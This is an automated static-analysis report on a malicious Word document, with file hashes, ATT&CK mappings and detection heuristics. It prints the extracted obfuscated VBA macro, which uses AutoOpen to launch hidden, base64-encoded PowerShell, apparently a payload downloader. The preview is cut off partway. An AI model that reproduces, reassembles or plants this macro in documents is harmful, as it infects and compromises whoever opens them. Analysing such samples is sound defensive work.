Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 3a39ef1275746d1a…

Verdict: MALICIOUS

File type: Office (OLE)

Size: 94.0 KB
Created: 2018-05-31 19:27:00
Authoring application: Microsoft Office Word
First seen: 2018-06-19
MD5: f8180accb6f8ef7e2dbb7b869e3a672e
SHA-1: d39047b7ceba9b41b874972d376bba3237dd5d84
SHA-256: 3a39ef1275746d1ada47d5902f0ae8c08230a38c4b0e6ff9a17050141c9bdb92
Risk score: 182

Malware Insights

MITRE ATT&CK
  • T1059.005: Visual Basic
  • T1204.002: Malicious File

The sample is a malicious Office document containing VBA macros. The Autoopen macro calls the UrDfsT function, which uses the Shell function to execute a command. That command is assembled from concatenated string fragments, including 'powershell -WindowStyle hidden -e KAAnAH oAUAAnACsAJwB', indicating a PowerShell invocation with an encoded (-e) argument. The primary purpose appears to be downloading and executing a secondary payload.

Heuristics (6)

  • VBA macros detected [medium, 3 related findings] OLE_VBA_MACROS
    Document contains VBA macro code.
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA.
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro.
  • VBA p-code auto-exec with execution tokens [high] OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence of the old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 17505 bytes
SHA-256: 32e61150833b7d7628bee581672035eb6d1f6cac53a4a0e7470298f684fdacf2

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "kjVjjkJTmifY"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function UrDfsT()
On Error Resume Next
Select Case KAliGjdXm
      Case 7109
         SwdKcD = 6638
         kYiof = CDbl(93502)
      Case 40931
         lBjdL = aYmQw
         jVopb = 59108
End Select
Select Case KAlNiwSX
      Case 22302
         kqnBL = 72600
         TrWFZQ = CDbl(32865)
      Case 42735
         XLFri = ktMAc
         ipiJS = 87705
End Select
UrDfsT = LPvsAbiz + Shell(BlKuzYbMYdp + Chr(vbKeyP) + dfsvp + pujLhY + pZatTZEfNTj + EawqIcrplc + HJFGl + Tpwoo + bdwfJwv + NTKSf + jDwwhzIik, BjMUu + vbHide + HccNRRqO)
Select Case KAljlkFM
      Case 50059
         iRjCO = 5565
         dYGSTj = CDbl(42767)
      Case 11192
         pKJdpC = wHWAmT
         GsRSkT = 18390
End Select
End Function
Sub Autoopen()
On Error Resume Next
Select Case KAlmZQBQ
      Case 54229
         wKudqu = 90998
         wabin = CDbl(90011)
      Case 82979
         EKlAZ = Qlmkf
         jNomL = 11332
End Select
UrDfsT
Select Case KAlMGIct
      Case 20773
         VrIoWP = 91571
         LqibR = CDbl(94354)
      Case 88661
         qGOXT = moThmi
         vhspjf = 47498
End Select
End Sub


Attribute VB_Name = "wOQbLCzHjoL"
Function dfsvp()
On Error Resume Next
Select Case KAlzoGbwZ
      Case 5257
         wowTnW = 32643
         YWlbJJ = CDbl(54997)
      Case 44055
         JUvNSj = brFOJ
         QJzpTN = 30475
End Select
mACEBHCN = "owersHeL" + "L -Wi" + "nDowsTyle h" + "idden -e KAAnAH" + "oAUAAnACsAJwB"
Select Case KAlZWzOt
      Case 25072
         japMj = 83534
         FGkdIY = CDbl(85254)
      Case 92161
         CbkFc = UpOHZk
         wzYTSv = 32496
End Select
IqzuX = "yACcAKwAnA" + "G4AJwArACcA" + "cwBhAGQAJw" + "ArACcAYQBzACc" + "AKwAnA"
Select Case KAlCawdD
      Case 81698
         qFrRd = 12811
         nIHfCG = CDbl(99888)
      Case 95244
         RCIKlF = GzfzAB
         cZnPzJ = 29939
End Select
cNREpPGYqjm = "GQAIAA9ACcAKwA" + "nACAA" + "JgAoAG4AYgA4AG4" + "AbgBiADgAKwBu" + "AGIAJwArACc" + "AOABlA"
Select Case KAlHqzMQ
      Case 23314
         sKQEzi = 51017
         fTkQlU = CDbl(96293)
      Case 13339
         mTfGPq = oMJvR
         YocTE = 38982
End Select
lzUfwurkfBF = "G4AYgA4" + "ACsAbgAnA" + "CsAJw" + "BiADgAdwAnACsAJ" + "wAtAG8AYgBq" + "AGUAYw"
Select Case KAlvDKBdH
      Case 90911
         sinJj = 5077
         whjdT = CDbl(31072)
      Case 31245
         VfdUuw = RPdXBi
         dcHvl = 92597
End Select
hwXTvOAPVw = "BuAGIAOAArA" + "G4AYgA" + "4AHQAJwArA" + "CcAbgAnACsAJw" + "BiADgAJwArAC" + "cAKQAgAHIAJw"
dfsvp = mACEBHCN + IqzuX + cNREpPGYqjm + lzUfwurkfBF + hwXTvOAPVw
End Function
Function pujLhY()
On Error Resume Next
Select Case KAlVmhIzr
      Case 91554
         bATfSo = 43642
         mASEMY = CDbl(60588)
      Case 23045
         rnDEV = iUCAs
         MvEsfo = 56500
End Select
warWY = "ArACcAYQBuAG" + "QAJwAr" + "ACcAbwBtAD" + "sAegBQA"
Select Case KAlVQVGc
      Case 41387
         TrVzGV = 13362
         EriFc = CDbl(77961)
      Case 21759
         odDaE = LhjCH
         aRzbzc = 22031
End Select
QwWQUqsIT = "HIAWQAnACsAJwBZ" + "AFUAIAAnACsA" + "JwA9ACAAL" + "gAoAG" + "4AYgA4AG4"
Select Case KAlhDmaFn
      Case 98708
         wiBQK = 1696
         cZvqEj = CDbl(77242)
      Case 26524
         Oahmu = Fzdji
         rdUQPK = 70391
End Select
ViYTJzHYzcz = "AZQAnA" + "CsAJwBuA" + "GIAOAArA" + "G4AJwArACcAY" + "gAnACsAJ" + "wA4ACcAKwAnA" + "HcAJwArACc"
Select Case KAlArVZk
      Case 39221
         ElGvs = 79749
         LiGMGq = CDbl(55831)
      Case 3458
         bSwlva = pVDNDX
         HCaDB = 25786
End Select
jXjwXGIhE = "AbgAnACsAJwBi" + "ADgAKw" + "BuAGIAOAAt" + "AG8AYgBqAGUAYw" + "B0ACcAKwA" + "nAG4AJ"
pujLhY = warWY + QwWQUqsIT + ViYTJzHYzcz + jXjwXGIh
... (truncated)